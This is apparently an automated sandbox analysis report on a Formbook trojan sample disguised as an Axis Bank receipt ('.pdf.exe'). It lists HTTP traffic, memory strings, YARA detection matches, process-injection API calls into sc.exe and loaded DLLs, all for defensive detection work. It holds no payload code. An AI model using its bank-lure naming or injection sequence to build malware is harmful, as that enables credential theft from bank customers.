Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 29 Mar 2024 13:26:32 GMT | Connection: close | Content-Length: 103 | Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 29 Mar 2024 13:26:35 GMT | Connection: close | Content-Length: 103 | Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 29 Mar 2024 13:26:37 GMT | Connection: close | Content-Length: 103 | Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 29 Mar 2024 13:26:25 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 29 Mar 2024 13:26:28 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 29 Mar 2024 13:26:31 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 29 Mar 2024 13:26:34 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 266 | Connection: close | Vary: Accept-Encoding | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rprostranstvo.ru Port 80</address></body></html>
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix

E-Banking Fraud

Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040C003 NtAllocateVirtualMemory, 10_2_0040C003
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B0F3 NtCreateSection, 10_2_0040B0F3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040A8B3 NtGetContextThread, 10_2_0040A8B3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040AAC3 NtSetContextThread, 10_2_0040AAC3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B313 NtMapViewOfSection, 10_2_0040B313
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040BBE3 NtDelayExecution, 10_2_0040BBE3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040ACD3 NtResumeThread, 10_2_0040ACD3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B543 NtCreateFile, 10_2_0040B543
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042BD13 NtClose, 10_2_0042BD13
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040A6A3 NtSuspendThread, 10_2_0040A6A3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040B773 NtReadFile, 10_2_0040B773
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2B60 NtClose,LdrInitializeThunk, 10_2_01AC2B60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_01AC2DF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_01AC2C70
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC35C0 NtCreateMutant,LdrInitializeThunk, 10_2_01AC35C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC4340 NtSetContextThread, 10_2_01AC4340
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC4650 NtSuspendThread, 10_2_01AC4650
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BA0 NtEnumerateValueKey, 10_2_01AC2BA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2B80 NtQueryInformationFile, 10_2_01AC2B80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BE0 NtQueryValueKey, 10_2_01AC2BE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2BF0 NtAllocateVirtualMemory, 10_2_01AC2BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AB0 NtWaitForSingleObject, 10_2_01AC2AB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AF0 NtWriteFile, 10_2_01AC2AF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2AD0 NtReadFile, 10_2_01AC2AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DB0 NtEnumerateKey, 10_2_01AC2DB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2DD0 NtDelayExecution, 10_2_01AC2DD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D30 NtUnmapViewOfSection, 10_2_01AC2D30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D00 NtSetInformationFile, 10_2_01AC2D00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2D10 NtMapViewOfSection, 10_2_01AC2D10
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CA0 NtQueryInformationToken, 10_2_01AC2CA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CF0 NtOpenProcess, 10_2_01AC2CF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2CC0 NtQueryVirtualMemory, 10_2_01AC2CC0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C00 NtQueryInformationProcess, 10_2_01AC2C00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2C60 NtCreateKey, 10_2_01AC2C60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FA0 NtQuerySection, 10_2_01AC2FA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FB0 NtResumeThread, 10_2_01AC2FB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F90 NtProtectVirtualMemory, 10_2_01AC2F90
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2FE0 NtCreateFile, 10_2_01AC2FE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F30 NtCreateSection, 10_2_01AC2F30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2F60 NtCreateProcessEx, 10_2_01AC2F60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2EA0 NtAdjustPrivilegesToken, 10_2_01AC2EA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2E80 NtReadVirtualMemory, 10_2_01AC2E80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2EE0 NtQueueApcThread, 10_2_01AC2EE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC2E30 NtWriteVirtualMemory, 10_2_01AC2E30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3090 NtSetValueKey, 10_2_01AC3090
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3010 NtOpenDirectoryObject, 10_2_01AC3010
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC39B0 NtGetContextThread, 10_2_01AC39B0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3D10 NtOpenProcessToken, 10_2_01AC3D10
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC3D70 NtOpenThread, 10_2_01AC3D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03544340 NtSetContextThread,LdrInitializeThunk, 14_2_03544340
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03544650 NtSuspendThread,LdrInitializeThunk, 14_2_03544650
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542B60 NtClose,LdrInitializeThunk, 14_2_03542B60
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_03542BF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BE0 NtQueryValueKey,LdrInitializeThunk, 14_2_03542BE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542BA0 NtEnumerateValueKey,LdrInitializeThunk, 14_2_03542BA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AD0 NtReadFile,LdrInitializeThunk, 14_2_03542AD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AF0 NtWriteFile,LdrInitializeThunk, 14_2_03542AF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F30 NtCreateSection,LdrInitializeThunk, 14_2_03542F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FE0 NtCreateFile,LdrInitializeThunk, 14_2_03542FE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FB0 NtResumeThread,LdrInitializeThunk, 14_2_03542FB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542EE0 NtQueueApcThread,LdrInitializeThunk, 14_2_03542EE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542E80 NtReadVirtualMemory,LdrInitializeThunk, 14_2_03542E80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D10 NtMapViewOfSection,LdrInitializeThunk, 14_2_03542D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D30 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_03542D30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DD0 NtDelayExecution,LdrInitializeThunk, 14_2_03542DD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DF0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_03542DF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C70 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_03542C70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C60 NtCreateKey,LdrInitializeThunk, 14_2_03542C60
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CA0 NtQueryInformationToken,LdrInitializeThunk, 14_2_03542CA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035435C0 NtCreateMutant,LdrInitializeThunk, 14_2_035435C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035439B0 NtGetContextThread,LdrInitializeThunk, 14_2_035439B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542B80 NtQueryInformationFile, 14_2_03542B80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AB0 NtWaitForSingleObject, 14_2_03542AB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F60 NtCreateProcessEx, 14_2_03542F60
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F90 NtProtectVirtualMemory, 14_2_03542F90
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FA0 NtQuerySection, 14_2_03542FA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542E30 NtWriteVirtualMemory, 14_2_03542E30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542EA0 NtAdjustPrivilegesToken, 14_2_03542EA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D00 NtSetInformationFile, 14_2_03542D00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DB0 NtEnumerateKey, 14_2_03542DB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C00 NtQueryInformationProcess, 14_2_03542C00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CC0 NtQueryVirtualMemory, 14_2_03542CC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CF0 NtOpenProcess, 14_2_03542CF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543010 NtOpenDirectoryObject, 14_2_03543010
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543090 NtSetValueKey, 14_2_03543090
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543D70 NtOpenThread, 14_2_03543D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543D10 NtOpenProcessToken, 14_2_03543D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B586A0 NtClose, 14_2_02B586A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58620 NtDeleteFile, 14_2_02B58620
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B587D0 NtAllocateVirtualMemory, 14_2_02B587D0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58430 NtCreateFile, 14_2_02B58430
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58560 NtReadFile, 14_2_02B58560
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000002.2097492577.0000000006E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000000.2049552997.00000000001E2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUZhG.exe( vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 00000000.00000002.2072819144.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.0000000001621000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesc.exej% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001B7D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesc.exej% vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Binary or memory string: OriginalFilenameUZhG.exe( vs Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
